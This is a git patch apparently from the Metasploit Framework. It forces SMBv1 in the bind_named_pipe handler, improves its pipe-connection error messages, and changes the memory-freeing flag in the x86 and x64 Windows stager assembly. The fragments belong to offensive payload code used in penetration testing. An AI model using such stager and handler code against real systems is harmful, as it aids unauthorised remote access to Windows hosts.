From c5dce5edd7e65c01a36043475e7bd34de478e904 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 2 Jul 2018 14:54:00 -0500 Subject: [PATCH] Land #10217, keep bind_named_pipe with SMBv1 --- lib/msf/core/handler/bind_named_pipe.rb | 12 +++++++++--- lib/msf/core/payload/windows/bind_named_pipe.rb | 4 ++-- lib/msf/core/payload/windows/x64/bind_named_pipe.rb | 4 ++-- 3 files changed, 13 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/handler/bind_named_pipe.rb b/lib/msf/core/handler/bind_named_pipe.rb index b0fa2ab6cd..1450102452 100644 --- a/lib/msf/core/handler/bind_named_pipe.rb +++ b/lib/msf/core/handler/bind_named_pipe.rb @@ -194,7 +194,8 @@ class SimpleClientPipe < Rex::Proto::SMB::SimpleClient def create_pipe(path) pkt = self.client.create_pipe(path, Rex::Proto::SMB::Constants::CREATE_ACCESS_EXIST) file_id = pkt['Payload'].v['FileID'] - self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, simple: self, + versions = [1] # requires rex so SMB1 only + self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, versions, simple: self, server_max_buffer_size: self.server_max_buffer_size) end end @@ -329,14 +330,19 @@ module Msf while (stime + ctimeout > Time.now.to_i) begin pipe = simple.create_pipe("\\"+pipe_name) - rescue + rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e + error_name = e.get_error(e.error_code) + unless ['STATUS_OBJECT_NAME_NOT_FOUND', 'STATUS_PIPE_NOT_AVAILABLE'].include? error_name + print_error("Error connecting to #{pipe_name}: #{error_name}") + return + end Rex::ThreadSafe.sleep(1.0) end break if pipe end if not pipe - print_error("Failed to connect to pipe #{smbshare}") + print_error("Failed to connect to pipe \\#{pipe_name} on #{rhost}") return end diff --git a/lib/msf/core/payload/windows/bind_named_pipe.rb b/lib/msf/core/payload/windows/bind_named_pipe.rb index b2ca761aae..d14ba3163d 100644 --- a/lib/msf/core/payload/windows/bind_named_pipe.rb +++ b/lib/msf/core/payload/windows/bind_named_pipe.rb @@ -286,11 +286,11 @@ module Payload::Windows::BindNamedPipe ; something failed so free up memory pop ecx - push 0x4000 ; MEM_DECOMMIT + push 0x8000 ; MEM_RELEASE push 0 ; dwSize, 0 to decommit whole block push ecx ; lpAddress push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} - call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) + call ebp ; VirtualFree(payload, 0, MEM_RELEASE) cleanup_file: ; cleanup the pipe handle diff --git a/lib/msf/core/payload/windows/x64/bind_named_pipe.rb b/lib/msf/core/payload/windows/x64/bind_named_pipe.rb index f3e2994874..0b36bf5a1a 100644 --- a/lib/msf/core/payload/windows/x64/bind_named_pipe.rb +++ b/lib/msf/core/payload/windows/x64/bind_named_pipe.rb @@ -296,12 +296,12 @@ module Payload::Windows::BindNamedPipe_x64 ; something failed so free up memory push r15 pop rcx ; lpAddress - push 0x4000 ; MEM_DECOMMIT + push 0x8000 ; MEM_RELEASE pop r8 ; dwFreeType push 0 ; 0 to decommit whole block pop rdx ; dwSize mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} - call rbp ; VirtualFree(payload, 0, MEM_DECOMMIT) + call rbp ; VirtualFree(payload, 0, MEM_RELEASE) cleanup_file: ; clean up the pipe handle